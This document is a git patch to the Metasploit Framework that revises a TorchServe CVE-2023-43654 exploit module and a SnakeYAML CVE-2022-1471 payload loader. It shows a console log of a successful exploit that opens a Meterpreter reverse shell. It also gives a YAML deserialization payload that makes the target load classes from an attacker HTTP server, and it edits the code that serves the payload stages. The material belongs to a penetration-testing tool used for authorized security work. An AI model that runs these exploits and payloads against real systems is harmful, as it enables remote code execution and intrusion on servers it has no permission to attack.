From 86b7ec451843364de8440581d1da62c5dd9faa4a Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Wed, 11 Oct 2023 16:56:20 -0400 Subject: [PATCH] Address comments from the review --- .../multi/http/torchserver_cve_2023_43654.md | 9 +++++---- .../CVE-2022-1471/MyScriptEngineFactory.java | 2 +- external/source/exploits/CVE-2022-1471/README.md | 16 ++++++++++++---- .../exploit/remote/java/http/class_loader.rb | 9 +++++---- .../multi/http/torchserver_cve_2023_43654.rb | 5 ++++- 5 files changed, 27 insertions(+), 14 deletions(-) diff --git a/documentation/modules/exploit/multi/http/torchserver_cve_2023_43654.md b/documentation/modules/exploit/multi/http/torchserver_cve_2023_43654.md index 76322ad34962..c08d772e568b 100644 --- a/documentation/modules/exploit/multi/http/torchserver_cve_2023_43654.md +++ b/documentation/modules/exploit/multi/http/torchserver_cve_2023_43654.md @@ -33,20 +33,21 @@ PAYLOAD => java/meterpreter/reverse_tcp msf6 exploit(multi/http/torchserver_cve_2023_43654) > set LHOST 192.168.159.128 LHOST => 192.168.159.128 msf6 exploit(multi/http/torchserver_cve_2023_43654) > run + [*] Started reverse TCP handler on 192.168.159.128:4444 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target appears to be vulnerable. Version 0.8.1 is vulnerable. -[*] Using URL: http://192.168.159.128:9090/exploit/ +[*] Using URL: http://192.168.159.128:9090/VLz5xafKtJOjBAv/ [*] Registering the model archive... [+] Sending model archive -[*] Sending stage (59909 bytes) to 172.17.0.2 -[*] Meterpreter session 3 opened (192.168.159.128:4444 -> 172.17.0.2:39480) at 2023-10-05 16:13:54 -0400 +[*] Sending stage (57692 bytes) to 172.17.0.2 +[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 172.17.0.2:49662) at 2023-10-12 09:19:30 -0400 [*] Server stopped. meterpreter > getuid Server username: model-server meterpreter > sysinfo -Computer : 4dbcfe5cc11c +Computer : 187de8da4e1b OS : Linux 6.2.15-100.fc36.x86_64 (amd64) Architecture : x64 System Language : en_US diff --git a/external/source/exploits/CVE-2022-1471/MyScriptEngineFactory.java b/external/source/exploits/CVE-2022-1471/MyScriptEngineFactory.java index da5e382547af..c02184045e5c 100644 --- a/external/source/exploits/CVE-2022-1471/MyScriptEngineFactory.java +++ b/external/source/exploits/CVE-2022-1471/MyScriptEngineFactory.java @@ -1,4 +1,4 @@ -// javac -cp path/to/metasploit-payloads/data/java MyScriptEngineFactory.java +// javac -cp path/to/metasploit-framework/data/java MyScriptEngineFactory.java import javax.script.ScriptEngine; import javax.script.ScriptEngineFactory; import java.io.IOException; diff --git a/external/source/exploits/CVE-2022-1471/README.md b/external/source/exploits/CVE-2022-1471/README.md index a46db950d221..1a1450053ec8 100644 --- a/external/source/exploits/CVE-2022-1471/README.md +++ b/external/source/exploits/CVE-2022-1471/README.md @@ -1,17 +1,25 @@ # Overview -The Java file contained within will load and execute a Metasploit payload. It's intended to be loaded while exploit -CVE-2022-1471 which is a YAML deserialization vulnerability within the snakeyaml project. +The Java file contained within will load and execute a Metasploit payload. It's intended to be loaded as part of the +exploit for CVE-2022-1471 which is a YAML deserialization vulnerability within the snakeyaml project. + +See https://bitbucket.org/snakeyaml/snakeyaml/issues/561/cve-2022-1471-vulnerability-in for more information. ## Compiling -Compile the Java source file using `javac -cp path/to/metasploit-payloads/data/java MyScriptEngineFactory.java`. +It's necessary to specify the Metasploit Payloads data directory as the class path when compiling the code. See the +[metasploit-payloads][1] repository for instructions on how to compile the main Java payloads and install the data +files. + +Compile the Java source file using `javac -cp path/to/metasploit-framework/data/java MyScriptEngineFactory.java`. ## Usage Trigger the deserialization using the following YAML: ```yaml -!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://1.1.1.1:8080/"]]]] +!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://192.0.2.1:8080/"]]]] ``` Host the compiled class on an HTTP server along with the file `/META-INF/services/javax.script.ScriptEngineFactory`. The contents of this file should simply be the class name to load (`MyScriptEngineFactory`). See Metasploit's `Msf::Exploit::Remote::Java::HTTP::ClassLoader` mixin for more information and the remaining components necessary to deliver a Metasploit payload. + +[1]: https://github.com/rapid7/metasploit-payloads/tree/master/java diff --git a/lib/msf/core/exploit/remote/java/http/class_loader.rb b/lib/msf/core/exploit/remote/java/http/class_loader.rb index 0af49e19d130..a953a09b6877 100644 --- a/lib/msf/core/exploit/remote/java/http/class_loader.rb +++ b/lib/msf/core/exploit/remote/java/http/class_loader.rb @@ -63,21 +63,22 @@ def on_request_uri(cli, request) case resource # Stage 1 when "#{class_name}.class" - vprint_good('Sending constructor class') + vprint_good('Sending the constructor class') # This contains the constructor that will call our JavaPayload res = constructor_class # Stage 2 when 'metasploit/Payload.class' - vprint_good('Sending payload class') + vprint_good('Sending the main payload class') # This is our JavaPayload as a compiled class res = MetasploitPayloads.read('java/metasploit/Payload.class') # Stage 3 when 'metasploit.dat' - vprint_good('Sending payload config') + vprint_good('Sending the payload configuration data') # This tells the target how to address the payload; this is the magic! res = payload_instance.stager_config # (Optional) Stage 4 data for unstaged payloads such as java/shell_reverse_tcp - when /^javapayload\/stage\/(Shell|Stage|StreamForwarder)\.class$/ + when /^javapayload\/stage\/(?:Shell|Stage|StreamForwarder)\.class$/ + vprint_good("Sending additional payload class: #{resource}") res = MetasploitPayloads.read("java/#{resource}") else vprint_error('Sending 404') diff --git a/modules/exploits/multi/http/torchserver_cve_2023_43654.rb b/modules/exploits/multi/http/torchserver_cve_2023_43654.rb index baf23a7efa1a..794d11c00625 100644 --- a/modules/exploits/multi/http/torchserver_cve_2023_43654.rb +++ b/modules/exploits/multi/http/torchserver_cve_2023_43654.rb @@ -70,7 +70,8 @@ def check end version = res.get_json_document.dig('info', 'version') - return Exploit::CheckCode::Safe unless version.present? + return Exploit::CheckCode::Detected unless version.present? + unless Rex::Version.new(version) < Rex::Version.new('8.0.2') return Exploit::CheckCode::Safe("Version #{version} is patched.") end @@ -144,6 +145,8 @@ def exploit def cleanup super + return unless @model_name + # see: https://pytorch.org/serve/management_api.html#unregister-a-model send_request_cgi({ 'method' => 'DELETE',